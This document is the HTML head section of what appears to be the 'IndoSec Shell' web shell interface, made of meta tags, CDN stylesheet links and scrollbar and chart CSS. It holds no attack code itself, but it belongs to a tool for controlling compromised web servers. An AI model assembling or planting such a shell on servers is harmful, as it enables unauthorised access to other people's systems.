<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang=""> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang=""> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang=""> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js" lang="en">
  <!--<![endif]-->

  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <title>{ IndoSec }</title>
    <meta name="description" content="{ IndoSec Shell }" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="Rizsyad AR" />
    <meta name="copyright" content="{ IndoSec }" />

    <link
      rel="apple-touch-icon"
      href="https://raw.githubusercontent.com/Rizsyad/IndoSec-ShEll/main/assets/img/icon.png"
    />
    <link
      rel="shortcut icon"
      href="https://raw.githubusercontent.com/Rizsyad/IndoSec-ShEll/main/assets/img/icon.png"
    />

    <link
      rel="stylesheet"
      href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css"
    />

    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/gh/lykmapipo/themify-icons@0.1.2/css/themify-icons.css"
    />

    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css"
      async
    />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"
    />

    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/gh/Rizsyad/IndoSec-ShEll/assets/css/style.css"
    />

    <link
      href="https://fonts.googleapis.com/css?family=Open+Sans:400,600,700,800"
      rel="stylesheet"
      type="text/css"
    />
    <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>
  </head>
  <style>
    body::-webkit-scrollbar {
      width: 10px;
    }
    body::-webkit-scrollbar-track {
      background-color: #162447;
    }
    body::-webkit-scrollbar-thumb {
      border-radius: 10px;
      background-color: #a156ff;
      box-shadow: inset 0 0 6px rgba(0, 0, 0, 0.3);
    }

    /* Chart.js */
    @-webkit-keyframes chartjs-render-animation {
      from {
        opacity: 0.99;
      }
      to {
        opacity: 1;
      }
    }
    @keyframes chartjs-render-animation {
      from {
        opacity: 0.99;
      }
      to {
        opacity: 1;
      }
    }
    .chartjs-render-monitor {
      -webkit-animation: chartjs-render-animation 0.001s;
      animation: chartjs-render-animation 0.001s;
    }
  </style>

  <body>